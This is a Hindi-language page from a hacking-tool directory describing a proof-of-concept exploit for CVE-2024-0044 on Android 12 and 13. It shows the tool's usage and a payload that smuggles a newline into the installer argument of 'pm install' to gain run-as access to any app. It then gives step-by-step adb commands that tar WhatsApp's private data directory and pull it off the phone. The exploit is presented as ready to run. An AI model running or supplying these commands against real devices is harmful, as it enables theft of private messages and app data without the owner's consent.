Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
c-CVE-2024-0044 — CVE-2024-0044: एक उच्च गंभीरता वाली 'किसी भी एप्लिकेशन के रूप में निष्पादित' प्रकार की कमजोरी जो Android के संस्करण 12 और 13 को प्रभावित करती है | Kitploit
उपकरण/GitHubGitHub/007criptografia/c-cve-2024-0044
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणमोबाइल ऐप पेंटेस्टिंगडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHub007criptografia/c-cve-2024-0044

c-CVE-2024-0044

CVE-2024-0044: एक उच्च गंभीरता वाली 'किसी भी एप्लिकेशन के रूप में निष्पादित' प्रकार की कमजोरी जो Android के संस्करण 12 और 13 को प्रभावित करती है

412 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE 2024 0044

CVE-2024-0044, जिसकी पहचान PackageInstallerService.java फ़ाइल के createSessionInternal फ़ंक्शन में हुई है, एक उच्च-गंभीरता वाली कमजोरी है जो Android संस्करण 12 और 13 को प्रभावित करती है। यह कमजोरी एक हमलावर को "run-as any app" हमला करने की अनुमति देती है, जिससे उपयोगकर्ता की सहभागिता के बिना स्थानीय विशेषाधिकार वृद्धि होती है। यह समस्या createSessionInternal फ़ंक्शन के अंदर अनुचित इनपुट सत्यापन के कारण उत्पन्न होती है। एक हमलावर सत्र निर्माण प्रक्रिया में हेरफेर करके इसका शोषण कर सकता है, संभावित रूप से संवेदनशील डेटा तक अनधिकृत पहुंच प्राप्त कर सकता है और प्रभावित डिवाइस पर अनधिकृत कार्य कर सकता है।

शोषण की खोज Meta security द्वारा की गई थी।

प्रूफ ऑफ कॉन्सेप्ट को Tiny hack द्वारा संक्षेपित और साझा किया गया था।

सुरक्षा पैच के बारे में विवरण Android security bulletin पर पाए जा सकते हैं।

आवश्यक शर्तें

  1. अपने मोबाइल फोन में USB डिबगिंग सक्षम करें और इसे USB केबल या वायरलेस डिबगिंग का उपयोग करके अपनी मशीन से कनेक्ट करें।
  2. अपनी मशीन पर कोई भी APK डाउनलोड करें, आप F-DROID का उपयोग कर सकते हैं।

टूल का उपयोग कैसे करें

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P का उपयोग उस लक्ष्य पैकेज नाम को निर्दिष्ट करने के लिए किया जाता है जिसके रूप में आप चलाना चाहते हैं।

-A का उपयोग डिवाइस में पुश करने के लिए APK फ़ाइल निर्दिष्ट करने के लिए किया जाता है।

शोषण

टूल चलाएँ python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

इस तरह एक payload.txt फ़ाइल उत्पन्न होगी

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

टूल कुछ भागों को स्वचालित करता है और कुछ भाग मैन्युअल हैं। आप पेलोड उत्पन्न करने के बाद बाहर निकल सकते हैं और सभी कमांड मैन्युअल रूप से चला सकते हैं या निर्देशों के साथ जारी रख सकते हैं।

अगला, आपको adb shell का उपयोग करके अपने डिवाइस से कनेक्ट करना होगा और पेलोड को पेस्ट करना होगा और सुनिश्चित करना होगा कि आपको अंतिम कमांड के बाद Success संदेश वापस मिले।

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

अगला, हम निम्नलिखित कमांड का उपयोग करके whatsapp डेटा प्राप्त करते हैं

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

एक अस्थायी निर्देशिका बनाएँ: mkdir /data/local/tmp/wa/

tar फ़ाइल के लिए एक प्लेसहोल्डर बनाएँ: touch /data/local/tmp/wa/wa.tar

व्यापक-खुली अनुमतियाँ सेट करें: chmod -R 0777 /data/local/tmp/wa/ ताकि कोई भी उपयोगकर्ता इस निर्देशिका के अंदर पढ़, लिख और निष्पादित कर सके।

उपयोगकर्ता संदर्भ स्विच करें: run-as victim ताकि "victim" उपयोगकर्ता के समान अनुमतियाँ प्राप्त हों।

लक्ष्य एप्लिकेशन के डेटा को संग्रहित करें: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, WhatsApp डेटा निर्देशिका का एक tarball बनाते हुए।

अंत में डेटा खींचें

adb pull /data/local/tmp/wa/wa.tar

आप 7z या किसी अन्य टूल का उपयोग करके डेटा निकाल सकते हैं।

आप इसे HTML में बदलने के लिए Whatsapp chat exporter का उपयोग कर सकते हैं।

यह आपको अपने डिवाइस पर रूट एक्सेस के बिना whatsapp डेटा प्राप्त करने की अनुमति देता है।

टूल डाउनलोड करें